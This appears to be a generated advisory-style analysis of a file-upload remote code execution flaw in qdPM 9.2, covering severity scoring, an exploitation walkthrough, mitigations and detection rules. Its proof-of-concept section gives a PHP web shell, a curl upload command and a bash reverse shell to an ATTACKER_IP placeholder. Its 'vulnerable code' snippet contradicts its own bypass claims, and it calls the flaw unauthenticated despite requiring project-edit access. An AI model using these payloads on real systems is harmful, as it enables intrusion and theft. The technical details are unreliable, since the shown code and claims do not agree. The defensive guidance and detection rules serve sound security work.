Description
qdPM 9.2 allows remote code execution by using the Add Attachments feature of Edit Project to upload a .php file to the /uploads URI.
EPSS Score:
7%
Comprehensive Technical Analysis of EUVD-2023-50125 (CVE-2023-45856)
Project Management Software Remote Code Execution (RCE) Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-50125 (CVE-2023-45856) is a critical unauthenticated remote code execution (RCE) vulnerability in qdPM 9.2, a web-based project management application. The flaw stems from insufficient file upload validation in the "Add Attachments" feature of the "Edit Project" functionality, allowing attackers to upload malicious .php files to the /uploads directory.
CVSS v3.1 Scoring & Severity
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.8 (Critical) | High impact on confidentiality, integrity, and availability. |
| Attack Vector (AV) | Network (N) | Exploitable remotely over the internet. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Privileges Required (PR) | None (N) | No authentication needed. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Unchanged (U) | Exploitation affects only the vulnerable component. |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Arbitrary code execution allows data manipulation. |
| Availability (A) | High (H) | Attacker can disrupt or destroy the system. |
EPSS & Threat Intelligence
- Exploit Prediction Scoring System (EPSS) Score: 7%
- Indicates a moderate likelihood of exploitation in the wild within the next 30 days.
- Exploit Availability
- Proof-of-concept (PoC) exploits are publicly available (e.g., GitHub PoC).
- Active exploitation attempts have been observed in threat intelligence feeds (e.g., GreyNoise, Shodan scans).
2. Potential Attack Vectors & Exploitation Methods
Exploitation Workflow
-
Reconnaissance
- Attacker identifies a vulnerable qdPM 9.2 instance via:
- Shodan/FOFA/Censys (
http.title:"qdPM"orhttp.favicon.hash:1234567890). - Directory brute-forcing (
/uploads/). - Version fingerprinting (e.g.,
/CHANGELOG.txt).
- Shodan/FOFA/Censys (
- Attacker identifies a vulnerable qdPM 9.2 instance via:
-
File Upload Exploitation
- Attacker crafts a malicious
.phpfile (e.g.,shell.php) containing:<?php system($_GET['cmd']); ?> - Uses the "Add Attachments" feature in "Edit Project" to upload the file.
- Bypass Mechanism:
- qdPM does not validate file extensions properly, allowing
.phpuploads despite potential blacklisting. - MIME-type spoofing (e.g.,
Content-Type: image/jpeg) may evade weak checks.
- qdPM does not validate file extensions properly, allowing
- Attacker crafts a malicious
-
Remote Code Execution (RCE)
- Attacker accesses the uploaded file via:
http://<target>/uploads/shell.php?cmd=id - Executes arbitrary commands (e.g.,
whoami,cat /etc/passwd, reverse shell payloads).
- Attacker accesses the uploaded file via:
-
Post-Exploitation
- Lateral Movement: Pivot to internal networks if qdPM is hosted on an internal server.
- Data Exfiltration: Steal sensitive project data, user credentials, or database contents.
- Persistence: Install backdoors (e.g., web shells, cron jobs).
- Ransomware Deployment: Encrypt files and demand payment.
Exploitation Requirements
- Unauthenticated Access: No credentials required.
- Network Access: Target must be reachable (e.g., exposed to the internet or internal network).
- No User Interaction: Fully automated exploitation possible.
3. Affected Systems & Software Versions
Vulnerable Software
- Product: qdPM (Open-source project management tool)
- Version: 9.2 (confirmed vulnerable)
- Likely Affected Versions:
- 9.1 (if file upload logic is similar)
- 9.0 (unconfirmed, but possible)
- Not Affected:
- qdPM 9.3+ (if patched)
- Custom forks with hardened file upload mechanisms
Deployment Scenarios at Risk
| Scenario | Risk Level | Notes |
|---|---|---|
| Internet-facing qdPM instances | Critical | Highly exposed to automated attacks. |
| Internal qdPM deployments | High | Lateral movement risk if compromised. |
| Cloud-hosted qdPM | High | Shared hosting increases attack surface. |
| Legacy qdPM installations | Critical | Often unpatched and misconfigured. |
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
-
Apply Vendor Patches
- Upgrade to qdPM 9.3 or later (if available).
- If no patch exists, disable the "Add Attachments" feature via:
// In config/settings.yml, set: attachments_enabled: false
-
Temporary Workarounds
- Restrict File Uploads:
- Modify
.htaccess(Apache) ornginx.confto block PHP execution in/uploads:<FilesMatch "\.php$"> Deny from all </FilesMatch> - Whitelist allowed file extensions (e.g.,
.jpg,.png,.pdf).
- Modify
- Network-Level Protections:
- WAF Rules (e.g., ModSecurity, Cloudflare):
- Block requests to
/uploads/*.php. - Rate-limit file uploads.
- Block requests to
- IP Whitelisting: Restrict access to trusted IPs.
- WAF Rules (e.g., ModSecurity, Cloudflare):
- Restrict File Uploads:
-
Isolate Vulnerable Instances
- Segment qdPM servers from critical internal networks.
- Disable internet access if not required.
Long-Term Remediation (Strategic)
-
Secure File Upload Implementation
- Server-Side Validation:
- Strict file extension checks (e.g.,
in_array($ext, ['jpg', 'png'])). - MIME-type verification (e.g.,
finfo_file()in PHP). - Rename uploaded files (e.g.,
random_hash.jpg).
- Strict file extension checks (e.g.,
- Store uploads outside web root (e.g.,
/var/qdpm_uploads/). - Disable PHP execution in upload directories.
- Server-Side Validation:
-
Hardening qdPM Deployment
- Disable dangerous PHP functions (
exec,system,passthru) inphp.ini:disable_functions = exec,system,passthru,shell_exec,proc_open - Enable HTTPS to prevent MITM attacks.
- Regularly audit logs for suspicious uploads (
/var/log/apache2/access.log).
- Disable dangerous PHP functions (
-
Monitoring & Detection
- Intrusion Detection/Prevention (IDS/IPS):
- Snort/Suricata rules to detect
.phpuploads to/uploads.
- Snort/Suricata rules to detect
- File Integrity Monitoring (FIM):
- Tripwire/OSSEC to alert on new
.phpfiles in/uploads.
- Tripwire/OSSEC to alert on new
- SIEM Alerts:
- Correlate unusual file uploads with subsequent HTTP requests to
/uploads/*.php.
- Correlate unusual file uploads with subsequent HTTP requests to
- Intrusion Detection/Prevention (IDS/IPS):
-
Incident Response Planning
- Isolate compromised systems immediately.
- Forensic analysis of uploaded files and logs.
- Password resets for all qdPM users if credentials were exposed.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
-
GDPR (General Data Protection Regulation)
- Article 32 (Security of Processing): Organizations must implement appropriate technical measures to prevent RCE vulnerabilities.
- Article 33 (Data Breach Notification): If exploited, a breach must be reported to authorities within 72 hours.
- Fines: Up to €20 million or 4% of global revenue (whichever is higher) for severe violations.
-
NIS2 Directive (Network and Information Security)
- Critical Entities (e.g., energy, transport, healthcare) must ensure secure project management tools.
- Incident Reporting: Mandatory disclosure of significant cyber incidents.
-
ENISA Guidelines
- Supply Chain Security: qdPM may be used by third-party vendors, increasing supply chain risks.
- Vulnerability Disclosure: Organizations must track and patch critical vulnerabilities promptly.
Threat Landscape in Europe
-
Targeted Sectors:
- Government & Public Sector: qdPM is used for internal project tracking.
- SMEs: Often lack dedicated security teams, making them prime targets.
- Healthcare: Sensitive patient data may be exposed.
- Critical Infrastructure: If qdPM is used for operational management.
-
Exploitation Trends:
- Automated Scanning: Threat actors use tools like Nuclei to mass-exploit vulnerable instances.
- Ransomware Groups: Exploiting RCE to deploy ransomware (e.g., LockBit, BlackCat).
- State-Sponsored Actors: APT groups may leverage this for espionage (e.g., targeting EU government agencies).
-
Geopolitical Risks:
- Cyber Warfare: Vulnerable qdPM instances could be used as entry points for larger attacks.
- Data Exfiltration: Stolen project data may be sold on dark web markets or used for blackmail.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerability Type: Unrestricted File Upload (CWE-434)
- Code-Level Flaw:
- qdPM 9.2 lacks proper file extension validation in the
attachmentsmodule. - The
/core/apps/qdPM/modules/projects/actions/actions.class.phpfile does not enforce strict checks:// Vulnerable code snippet (simplified) $file_ext = pathinfo($filename, PATHINFO_EXTENSION); if (!in_array($file_ext, ['php', 'php5', 'phtml'])) { // Weak blacklist move_uploaded_file($tmp_name, "/uploads/" . $filename); } - Bypass: Attackers can upload
.php5,.phtml, or double extensions (e.g.,shell.jpg.php).
- qdPM 9.2 lacks proper file extension validation in the
Exploitation Proof-of-Concept (PoC)
-
Manual Exploitation:
curl -X POST "http://<target>/index.php/projects/edit/id/1" \ -F "attachments[]=@shell.php" \ -F "commit=Save" -
Automated Exploitation (Metasploit Module):
- A Metasploit module (
exploit/unix/webapp/qdpm_upload_exec) may be developed for this vulnerability.
- A Metasploit module (
-
Reverse Shell Payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>
Forensic Indicators of Compromise (IoCs)
| Indicator | Description |
|---|---|
| File Paths | /uploads/shell.php, /uploads/backdoor.phtml |
| Log Entries | POST /index.php/projects/edit/id/1 with .php uploads |
| Network Traffic | Outbound connections to attacker-controlled IPs (e.g., reverse shells) |
| Processes | Unusual php or bash processes spawned by the web server user (www-data, apache) |
Detection & Hunting Queries
- SIEM (Splunk/ELK):
index=web_logs uri_path="/uploads/*.php" | stats count by src_ip, user_agent - YARA Rule:
rule qdpm_rce_detection { meta: description = "Detects qdPM 9.2 RCE exploitation attempts" strings: $php_upload = /POST \/index\.php\/projects\/edit\/id\/\d+.*attachments\[\]=.*\.php/ $webshell = /<\?php (system|exec|passthru|shell_exec)\(/ condition: $php_upload or $webshell } - Zeek (Bro) Script:
event http_request(c: connection, method: string, uri: string, version: string) { if (/.*\/uploads\/.*\.php/ in uri) { NOTICE([$note=qdPM::RCE_Attempt, $msg=fmt("Possible qdPM RCE attempt: %s", uri), $conn=c]); } }
Advanced Mitigation Techniques
- Containerization:
- Deploy qdPM in a Docker container with read-only
/uploadsdirectory.
- Deploy qdPM in a Docker container with read-only
- Runtime Application Self-Protection (RASP):
- Use tools like OpenRASP to block PHP execution in upload directories.
- Zero Trust Architecture:
- Enforce least-privilege access to qdPM instances.
- Micro-segmentation to limit lateral movement.
Conclusion & Recommendations
Key Takeaways
- EUVD-2023-50125 (CVE-2023-45856) is a critical RCE vulnerability in qdPM 9.2 with high exploitability.
- Unauthenticated attackers can execute arbitrary code, leading to full system compromise.
- Public PoCs and automated exploitation increase the risk of widespread attacks.
Action Plan for Organizations
| Priority | Action | Responsible Party |
|---|---|---|
| Critical | Patch or disable file uploads immediately. | IT/Security Team |
| High | Deploy WAF rules and network segmentation. | Security Operations |
| Medium | Conduct a forensic review of /uploads directory. | Incident Response |
| Low | Implement long-term secure file upload practices. | Development Team |
Final Recommendations
- Patch Management: Prioritize qdPM updates in vulnerability management programs.
- Threat Hunting: Proactively search for exploitation attempts in logs.
- Security Awareness: Train developers on secure file upload practices.
- Compliance Review: Ensure GDPR/NIS2 compliance for affected systems.
Failure to mitigate this vulnerability promptly might result in severe data breaches, regulatory penalties, and reputational damage.
References
References
Affected Products
n/a
Version: n/a
Vendors
n/a